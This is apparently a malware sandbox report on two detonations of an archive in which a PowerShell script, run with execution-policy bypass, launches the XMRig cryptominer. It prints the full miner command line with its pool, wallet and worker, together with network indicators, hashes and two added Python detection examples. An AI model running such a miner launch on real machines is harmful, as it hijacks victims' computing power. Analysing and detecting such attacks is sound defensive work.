Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 13:33
Signatures
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:33
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 hits; indicator, process and target fields are all N/A in this export | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2136 wrote to memory of 2740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2136 wrote to memory of 2740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
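The two command lines above are the whole chain for this run: a PowerShell script run with -ExecutionPolicy bypass from the user's Temp directory launches xmrig.exe (the PID 2136 to PID 2740 WriteProcessMemory entries are the normal side effect of that launch) with the pool, the coin-prefixed wallet and the worker name passed as plain arguments. The SeLockMemoryPrivilege requests by xmrig.exe are XMRig's own attempt to enable large pages for the RandomX algorithm selected by `-a rx`. The added example below, which is not part of the report and not the sandbox's signature logic, turns that chain into a detection over process-creation records: it splits the Windows command line, pulls the `-o`/`-u`/`-a`/`-p` options out of the miner invocation, and flags the PowerShell-to-Temp parent/child relationship. The record field names and the explorer.exe parent of the PowerShell process are assumptions; the report does not state them.

```python
"""Flag the PowerShell -> XMRig launch chain in process-creation records.

Added example, not taken from the sandbox report. EVENTS is constructed from
the report's Processes section (behavioral11 PIDs); the parent of the
PowerShell process is not in the report and is assumed to be explorer.exe.
The record field names (pid, parent_image, image, cmdline) are an assumption
as well, not any particular EDR schema.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
STRATUM_SCHEMES = {"stratum+tcp", "stratum+ssl"}   # pool URL schemes XMRig takes on -o
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# XMRig options that say where the hashes go, short and long forms.
MINER_OPTS = {"-o": "url", "--url": "url", "-u": "user", "--user": "user",
              "-a": "algo", "--algo": "algo", "-p": "pass", "--pass": "pass"}


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def miner_options(argv: list[str]) -> dict[str, str]:
    """Collect -o/-u/-a/-p values in both the '-o url' and '--url=url' spellings."""
    opts: dict[str, str] = {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        key, eq, val = tok.partition("=")
        if eq and key in MINER_OPTS:
            opts[MINER_OPTS[key]] = val
        elif tok in MINER_OPTS and i + 1 < len(argv):
            opts[MINER_OPTS[tok]] = argv[i + 1]
            i += 1
        i += 1
    return opts


@dataclass
class Finding:
    pid: int
    image: str
    reasons: list[str] = field(default_factory=list)
    scheme: str | None = None
    pool_host: str | None = None
    pool_port: int | None = None
    algo: str | None = None
    coin: str | None = None
    wallet: str | None = None
    worker: str | None = None


def analyse_event(ev: dict) -> Finding | None:
    f = Finding(pid=ev["pid"], image=ev["image"])
    cmd, image = ev["cmdline"], ev["image"]
    parent = ev.get("parent_image", "")

    opts = miner_options(split_cmdline(cmd))
    url = urlsplit(opts.get("url", ""))
    if url.scheme in STRATUM_SCHEMES:
        f.reasons.append("stratum pool URL on the command line")
        f.scheme, f.pool_host, f.pool_port = url.scheme, url.hostname, url.port
        f.algo = opts.get("algo")
        user = opts.get("user", "")
        # unMineable convention seen in the report: COIN:wallet.worker
        if ":" in user:
            f.coin, user = user.split(":", 1)
        f.wallet, _, worker = user.partition(".")
        f.worker = worker or None

    low = cmd.lower()
    if (image.lower().endswith("powershell.exe") and "-executionpolicy bypass" in low
            and "-file" in low and TEMP_DIR_RE.search(cmd)):
        f.reasons.append("powershell -ExecutionPolicy bypass running a script from %TEMP%")
    if parent.lower().endswith("powershell.exe") and TEMP_DIR_RE.search(image):
        f.reasons.append("executable under %TEMP% spawned by PowerShell")
    return f if f.reasons else None


def triage(events: list[dict]) -> list[Finding]:
    return [f for f in (analyse_event(e) for e in events) if f]


EVENTS = [  # constructed from the report's Processes section; explorer.exe parent is assumed
    {"pid": 2136, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"'},
    {"pid": 2740, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
    {"pid": 4100, "parent_image": r"C:\Windows\explorer.exe",   # benign control record
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f.pid, f.image.rsplit("\\", 1)[-1], "|", "; ".join(f.reasons))
        if f.pool_host:
            print(f"    pool={f.scheme}://{f.pool_host}:{f.pool_port} algo={f.algo} "
                  f"coin={f.coin} worker={f.worker} wallet={f.wallet[:12]}...")
```

The wallet and worker name are the most durable indicators here: the pool and the binary can change, but the attacker has to keep the payout address. Matching on the `-o stratum+...` argument alone will also catch legitimate miners, which is why the PowerShell-from-Temp parent is recorded as a separate reason rather than folded into one score.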
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
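Most rows in this table are reverse (PTR) lookups of addresses the host spoke to, which is sandbox and OS noise rather than attacker traffic. The rows that matter are the forward lookups and the TCP connections: github.com and objects.githubusercontent.com, consistent with the xmrig-6.21.3 archive being fetched from a GitHub release (the report does not spell out the URL), and the pool rx.unmineable.com at 161.35.34.195:443. The added example below is not part of the report; it parses rows in the table's own layout, folds each PTR name back into the IP it asks about so it can be matched against the connections actually seen, and produces the domain/IP pairs to hunt on. Only a subset of the rows is embedded so it runs offline.

```python
"""Reduce the report's Network table to actionable indicators.

Added example, not part of the sandbox report. NETWORK_TABLE is a subset of
the behavioral11 rows above, copied verbatim; the classification rules are
this example's own.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict

NETWORK_TABLE = """\
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
"""


def parse_rows(table: str) -> list[dict]:
    """Parse '| Country | ip:port | name | proto |' rows; header and blanks are skipped."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        ip, _, port = cells[1].rpartition(":")
        rows.append({"country": cells[0], "ip": ip, "port": int(port),
                     "name": cells[2], "proto": cells[3].lower()})
    return rows


def ptr_to_ip(name: str) -> str | None:
    """'215.156.26.20.in-addr.arpa' -> '20.26.156.215' (PTR names reverse the octets)."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def summarize(rows: list[dict]) -> dict:
    connections: dict[str, set[str]] = defaultdict(set)  # name -> {"ip:port"} over TCP
    lookups: set[str] = set()                             # forward DNS queries
    contacted: set[str] = set()                           # every destination IP seen
    ptr: dict[str, str] = {}                              # PTR name -> IP it asks about
    for r in rows:
        contacted.add(r["ip"])
        ip = ptr_to_ip(r["name"])
        if ip:
            ptr[r["name"]] = ip
        elif r["proto"] == "udp" and r["port"] == 53:
            lookups.add(r["name"])
        elif r["proto"] == "tcp":
            connections[r["name"]].add(f'{r["ip"]}:{r["port"]}')
    # PTRs for IPs that also appear as destinations explain themselves; the rest
    # are lookups for peers the table never shows a flow to.
    matched = {n: ip for n, ip in ptr.items() if ip in contacted}
    unmatched = {n: ip for n, ip in ptr.items() if ip not in contacted}
    return {"connections": dict(connections), "lookups": lookups,
            "ptr_matched": matched, "ptr_unmatched": unmatched}


def hunt_list(summary: dict, resolver_ips: tuple[str, ...] = ("8.8.8.8",)) -> list[tuple[str, str]]:
    """(domain, ip) pairs for every TCP peer except the resolver. GitHub stays in
    the list on purpose: it is the delivery channel here, and whether to block it
    is a policy decision rather than a given."""
    out = []
    for name, peers in sorted(summary["connections"].items()):
        for peer in sorted(peers):
            ip = peer.rpartition(":")[0]
            if ip not in resolver_ips:
                out.append((name, ip))
    return out


if __name__ == "__main__":
    s = summarize(parse_rows(NETWORK_TABLE))
    for name, ip in hunt_list(s):
        print(f"{name:32} {ip}")
    print("PTR lookups for peers with no flow in the table:", s["ptr_unmatched"])
```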
Files
memory/2136-0-0x00007FF83C2D3000-0x00007FF83C2D5000-memory.dmp
memory/2136-10-0x000001E272010000-0x000001E272032000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mvomhzn3.mij.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2136-11-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2136-12-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2136-14-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2136-15-0x000001E272400000-0x000001E272412000-memory.dmp
memory/2136-16-0x000001E272050000-0x000001E27205A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2740-47-0x0000022BB4D50000-0x0000022BB4D70000-memory.dmp
memory/2740-48-0x0000022BB4DA0000-0x0000022BB4DC0000-memory.dmp
memory/2740-49-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2136-50-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2740-54-0x0000022C47980000-0x0000022C479A0000-memory.dmp
memory/2740-53-0x0000022C47750000-0x0000022C47770000-memory.dmp
memory/2136-52-0x00007FF83C2D3000-0x00007FF83C2D5000-memory.dmp
memory/2740-51-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2136-55-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2740-56-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2136-57-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2740-58-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-60-0x0000022C47980000-0x0000022C479A0000-memory.dmp
memory/2740-59-0x0000022C47750000-0x0000022C47770000-memory.dmp
memory/2740-61-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-62-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-63-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-64-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-65-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-66-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-67-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-68-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-69-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-70-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-71-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-72-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-73-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-74-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-75-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-76-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-77-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-78-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-79-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-80-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-81-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-82-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-83-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-84-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-85-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-86-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-87-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-88-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-89-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-90-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-91-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-92-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-93-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-94-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-95-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-96-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-97-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-98-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-99-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-100-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-101-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-102-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-103-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-104-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-105-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-106-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-107-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-108-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-109-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-110-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-111-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-112-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-113-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-114-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-115-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-116-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-117-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-118-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-119-0x00007FF761540000-0x00007FF762173000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:44
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 hits; indicator, process and target fields are all N/A in this export | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2236 wrote to memory of 2056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2236 wrote to memory of 2056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/2236-0-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp
memory/2236-5-0x0000017F53840000-0x0000017F53862000-memory.dmp
memory/2236-8-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2236-9-0x0000017F6C070000-0x0000017F6C0E6000-memory.dmp
memory/2236-10-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qao0hgxn.ozr.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2236-25-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2236-48-0x0000017F6C010000-0x0000017F6C022000-memory.dmp
memory/2236-61-0x0000017F53920000-0x0000017F5392A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2056-90-0x0000012F163A0000-0x0000012F163C0000-memory.dmp
memory/2236-91-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp
memory/2236-92-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2056-93-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2236-94-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2056-95-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-96-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-97-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-98-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-99-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-100-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-101-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-102-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-103-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-104-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-105-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-106-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-107-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-108-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-109-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-110-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-111-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-112-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-113-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-114-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-115-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-116-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-117-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-118-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-119-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-120-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-121-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-122-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-123-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-124-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-125-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-126-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-127-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-128-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-129-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-130-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-131-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-132-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-133-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-134-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-135-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-136-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-137-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
